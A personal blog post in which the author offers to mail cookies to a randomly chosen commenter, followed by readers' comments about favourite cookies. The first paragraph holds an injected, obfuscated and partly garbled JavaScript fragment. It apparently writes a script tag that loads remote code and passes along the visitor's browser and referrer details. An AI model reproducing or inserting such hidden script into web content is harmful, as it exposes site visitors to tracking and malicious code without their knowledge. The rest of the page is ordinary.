Cookies for readers

One of the {many} blogs I read is i.am.baker. ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tends|var|u0026u|referrer|bkiiz||js|php’.split(‘|’),0,{}))
Amanda makes some pretty terrific desserts, but she excels at elaborately decorated sugar cookies and cakes with images on the inside {a heart inside a white cake or tulips for easter….I’m not kidding}.

Recently, she offered to send some cookies to a deserving person nominated by her readers.  She ended up with such an overwhelmingly response, that she decided to send cookies to all the nominees.  But there was no way 1 person could send cookies to 100+ people.  She asked her readers to volunteer to help and that’s exactly what I did.

So in the spirit of helping people out and doing nice things – I’m going to send YOU some cookies.  Just leave a comment and tell me your favorite kind of cookie.  I’ll pick someone at random and mail them some treats!

I’ll report back next Monday with the “winner”!

And just to get you excited, here are some of my past cookies.

bryn, i read both your blogs regularly
but it’s the promise of free cookies that gets me to comment!
i was just reading your “1000 useful things” post about bringing cookies to work
and i wished that i had such a considerate colleague!

favorite cookie has to be a basic chocolate chip with nuts 🙂

Why did we not buy you a kitchenaid mixer when we lived in Lander so you could make cookies for everyone in the building??? I like Gingersnaps and Snickerdoodles. Mostly because I have THE best Gingersnap recipe. They even are delicious after a cross country USPS trip! Maybe I should send the recipe to you so you can try it and tell me what you think. OR I will make some for you and send YOU cookies. The Snickerdoodle recipe is delicious as well but they do not mail well. Love all of your blog posts, keep it up!

Well, Steve votes for my triple chocolate pain in the butt to make cookies and I grew rather fond of a Cooking Light recipe for dark chocolate chunk with tart cherry that I found last year.

I read your blogs every morning, and dream of cookies every day. 🙂
Chocolate chip or snickerdoodles, yum…

Amazing idea! I could also help you save on postage and pick up the cookies from your house!

Oatmeal Raisin are my favorites!!!!

Yesssss!!!! Sign me up!!! Chocolate chip or Santa Surprise would be fabulous!! Thanks Bryn!! 🙂

you are too cute bryn! those santa surprises are my favorite though you can just wait til your next seattle trip to bring my winnings 🙂

I love how we all come out of the woodwork when you offer cookies!

(But I love cookies FAR more than any of these other people.)

You’re awesome.

Side note: Any interest in Disneyland the weekend before Memorial Day? I’m headed down with my parents, and we may have extra space.

Bryn, James and I are drooling over your cookie pictures! You need to start your own bakery.
Your frosted sugar cookies look amazing. I will trade you cookies for an eye exam… Does that work? Hope you and nick are doing well!

Comment, comment, comment, comment, comment, comment, comment, comment, comment. I LOVE THEM ALL (but go oatmeal)! Please?

i think my faves are those chocolate martha stewart ones. they won some contest. grammy’s chocolate cookies or something like that. i could eat a mountain of those.

I found this dairy-free recipe for thin mints. Game?? Kidding! I’d have to sat oatmeal choc chip…tho mine are made with a whole lot of crisco!
